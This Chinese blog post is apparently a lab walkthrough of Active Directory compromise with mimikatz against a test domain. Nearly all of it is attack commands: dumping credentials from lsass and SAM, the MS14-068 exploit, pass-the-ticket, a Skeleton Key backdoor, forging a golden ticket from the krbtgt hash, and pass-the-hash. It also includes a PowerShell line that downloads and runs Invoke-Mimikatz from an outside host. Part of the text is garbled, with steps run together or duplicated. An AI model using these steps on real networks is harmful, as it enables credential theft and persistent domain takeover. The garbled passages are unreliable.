内网渗透中mimikatz的使用

最新推荐文章于 2024-06-15 20:20:53 发布
最新推荐文章于 2024-06-15 20:20:53 发布
阅读量4.7w 收藏 69
点赞数 8
分类专栏: 渗透测试
0x01 简介

mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

0x02 测试环境

网络资源管理模式:


已有资源:

域内一台主机权限
操作系统:win7 x64
域权限:普通用户

0x03 测试目标

1、获得域控权限 2、导出所有用户口令 3、维持域控权限

0x04 测试过程

1、获取本机信息

mimikatz:

privilege::debug
sekurlsa::logonpasswords

获取本机用户名、口令、sid、LM hash、NTLM hash 如图
这里写图片描述

2、攻击域控,获得权限

使用ms14-068漏洞

ms14-068.exe -u -p -s -d
生成伪造缓存test.ccache:
这里写图片描述
导入伪造缓存: mimikatz:

kerberos::ptc test.ccache
登陆:

net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$

这里写图片描述
3、导出域(1)直接获取内存口令 mimikatz:

privilege::debug
sekurlsa::logonpasswords2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full3)通过powershell加载mimikatz获取口令

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:

lsadump::sam SYSTEM.hiv SAM.hiv持域控权限

(1)Skeleton Key mimikatz:
privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
4、维持域控权限

(1)Skeleton Key mimikatz:

privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test

这里写图片描述
(2)golden ticket mimikatz:

lsadump::lsa /patch
获取krbtgt的ntlmhash,如图
这里写图片描述

生成万能票据: mimikatz:

kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
导入票据: mimikatz:

kerberos::ptt test.kirbi
登陆域控:

net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$

这里写图片描述

Tips:

Golden Ticket不多说,自行理解
By default, the Golden Ticket default lifetime is 10 years
password changing/smartcard usage does not invalidate Golden Ticket;
this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed;
NTLM hash of krbtgt account is never changed automatically.
(3)Pass-The-Hash mimikatz:

sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

这里写图片描述

5、补充

登陆域控,刷新扫雷记录,留下名字;D mimikatz:

minesweeper::infos
如图
这里写图片描述

pyphrb
关注
  • 8
    点赞
  • 69
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Invoke-Mimikatz.ps1脚本使用
墨痕诉清风的博客
05-31 513
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //获取密码。有时当获得权限时无法使用mimikatz.exe时,可以考虑使用Invoke-Mimikatz.ps1脚本获取想要的数据。Import-Module .\Invoke-Mimikatz.ps1 //导入命令。Set-ExecutionPolicy Unrestricted //打开限制。
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1841
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
Invoke-Mimikatz.txt
03-01
Invoke-Mimikatz
cs与msf权限传递,以及mimikatz抓取明文密码
最新发布
M372109150的博客
06-15 1189
cs与msf权限传递,以及mimikatz抓取win10明文密码
Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes
weixin_46104215的博客
11-08 486
一、Invoke-Portscan Recon 模块的一个脚本,主要用于端口扫描 1.下载脚本 IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1") 2.扫描 Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444" 二、Invo
mimikatz工具使用
weixin_45605313的博客
07-10 1244
mimikatz使用命令:msf下的mimikatz mimikatz:后渗透工具,从window进程获取内存,并获取明文密码和NTLM哈希值的工具。 kali路径:/usr/share/windows-resources/mimikatz 使用 将工具移植到靶机: win32目录下 命令命令 含义 :: 查询帮助信息 standard:基础命令 命令 含义 exit 退出 cls 清屏 version 版本 cd 切换目录 localt
powershell + Invoke-Mimikatz.ps1获取系统密码
大方子
10-29 5990
参照:https://blog.51cto.com/simeon/2126106 进行实现 Invoke-Mimikatz.ps1下载地址 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 (1)目标主机具备网络环境 power...
通过xencrypt免杀invoke-mimikatz.ps1
网络安全。
03-03 1586
0x01 简介 xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。 0x02 使用 1、下载invoke-mimikatz.ps1到同级目录下。 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
【源码阅读】Mimikatz相关资料
weixin_30843605的博客
01-25 315
Mimikatz GitHub (源码) https://github.com/gentilkiwi/mimikatz Mimikatz GitHub Wiki (包含了一些说明文档) https://github.com/gentilkiwi/mimikatz/wiki GentilKiwi Blog (博客里的大多数内容是用法语写的,请使用 Chrome 浏览器进行自动翻译) ht...
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6735
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统的SAM文件和域控制器的NTDS.dit文件获得所有用户的hash。
Mimikatz介绍
#7的博客
03-26 1608
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
内网渗透系列之mimikatz使用以及后门植入
lza20001103的博客
09-04 4327
内网渗透系列之mimikatz使用以及后门植入 文章目录内网渗透系列之mimikatz使用以及后门植入前言mimikatz使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
内网渗透之某后渗透利用【网络安全】
kali_Ma的博客
03-23 3328
主要原理是在 Windows 系统用户登录后系统会将身份凭证存储于lsass.exe进程的内存当Mimikatz 通过注入lsass.exe进程读取进程内存,从获取对应的明文密码。
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1944
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存生成,早期版本的Windows ...
Mimikatz使用小技巧
KEY0NE的个人博客
10-27 125
大家都知道Mimikatz绝对是一款神器,这里就简单介绍下Mimikatz使用小技巧~1.记录 Mimikatz输出:C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件:C:\>mimik...
内网横向移动|哈希传递PTH|mimikatz使用
qq_60115503的博客
04-25 5124
Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 723
内网渗透—哈希传递攻击PTH的几种方式
内网横向移动—PTH哈希&PTT票据&PTK密匙&Kerberos
剁椒鱼头没剁椒的博客
07-17 1487
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
Mimikatz使用心得
weixin_34221332的博客
01-22 538
Mimikatz是一款由法国人编写的轻量级调试工具,但更为人所知的是使用Mimikatz来获取Windows的明文密码。 这个软件的作者博客:http://blog.gentilkiwi.com/mimikatz 作者把软件托管到Github上的,需要FQ才能下载。我已经下载好。这个软件杀毒软件会报毒,不过我已经修改了一个不报毒的版本。 原版,修改版,1.0和目前最新2.0版本,使用方法的下...
kali mimikatz使用教程
06-28
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过KaliMimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过KaliMimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境使用。在实际的工作,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值